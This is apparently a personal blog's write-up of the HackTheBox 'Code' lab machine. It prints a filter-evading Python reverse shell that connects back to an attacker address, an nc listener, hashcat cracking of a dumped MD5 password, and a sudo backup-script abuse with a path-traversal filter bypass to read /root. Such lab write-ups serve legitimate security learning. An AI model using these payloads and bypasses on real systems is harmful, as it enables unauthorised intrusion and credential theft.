Virts

Virts

Virts's Blog ❤️
telegram
github
email
steam
douban
HomeArchives

HackTheBox [Code] WriteUp

14
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The task involves exploiting a machine on HackTheBox called "Code." The initial step is to scan the open ports (22 and 5000), where port 5000 allows execution of Python code. By using the `getattr` function, a reverse shell is established. After gaining shell access, the user discovers an SQLite database containing user credentials. The password for the user "martin" is cracked using HashCat, allowing SSH access. For privilege escalation, the user identifies a script `/usr/bin/backy.sh` that processes a JSON file. By analyzing the script, the user constructs an attack chain to sync the `/root` directory to their user directory using `rsync`, and then archives it with `tar`. However, the method has a limitation as hidden files (like `.ssh`) are not synced, preventing full root access. The user learns about a double write bypass technique from other write-ups to overcome this limitation.

image

GetShell#

First, obtain the IP, scan the ports, and find that 22 and 5000 are open. It turns out that 5000 is an HTTP service, and upon accessing it, I discovered that Python code can be executed directly, although some dangerous functions are filtered.

I directly used getattr to bypass and spawn a shell, first starting nc to listen.

nc -lv 9443

Then, running the following code will allow for a reverse shell.

o_s = getattr(print.__self__, '__im' + 'port__')('o' + 's')
so = getattr(print.__self__, '__im' + 'port__')('soc' + 'ket')
sub = getattr(print.__self__, '__im' + 'port__')('subpro' + 'cess')
s=so.socket(so.AF_INET,so.SOCK_STREAM);
s.connect(('10.10.14.45',9443));
o_s.dup2(s.fileno(),0);
o_s.dup2(s.fileno(),1);
o_s.dup2(s.fileno(),2);
p=sub.call(['/bin/bash','-i']);

After obtaining the shell, I found an SQLite database named database.db. It contained two users, and I found the MD5 hashed username and password. Comparing with /etc/passwd, I discovered that the user martin exists, so I could crack the password and attempt to brute-force SSH.

Using HashCat to crack the password.

hashcat -m 0 martin.hash rockyou.txt

Successfully cracked the password and logged into SSH. At this point, GetShell was successful.

Privilege Escalation#

Actually, my approach to privilege escalation had some issues; I was only able to access all files under /root, including the flag file, but I did not truly escalate to root. I will note this down.

First, I used ssh -l to check the executable privileged commands and found a /usr/bin/backy.sh.

Upon inspecting its contents, I found that it performs a series of filtering processes on the input $json_file, then hands it over to the binary program backy.

I found the source code for backy on GitHub. Analyzing the source code, I discovered that it actually calls the rsync and tar commands to back up folders, and rsync accepts directories_to_sync from the JSON file as the source path for synchronization.

The /usr/bin/backy.sh only controls the directories_to_archive parameter processed by tar, so I could construct an attack chain like this: first, synchronize the /root folder to the user directory using rsync. The synchronized folder can only be accessed by the root user, so I could then use backy to tar the synchronized folder, and finally download and extract it to see its contents.

First, modify the task.json file.

{
	"destination": "/home/martin/root",
	"multiprocessing": true,
	"verbose_log": false,
	"directories_to_sync": [
		"/root"
	]
}

Then execute sudo backy.sh task.json, at which point the contents of /root will be synchronized to /home/martin/root, and then modify the task.json file.

{
	"destination": "/home/martin/backup",
	"multiprocessing": true,
	"verbose_log": false,
	"directories_to_archive": [
		"/home/martin/root"
	]
}

Execute sudo backy.sh task.json, and you will find the compressed file in /home/martin/backup, extracting it will yield the root flag.

However, there is a very obvious problem with this approach: rsync does not synchronize hidden folders like .ssh, so I cannot escalate to root. Later, I saw other people's WriteUp and found that it was necessary to bypass ../ using double writing, such as ..././. In any case, the challenge was still very interesting.

image

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.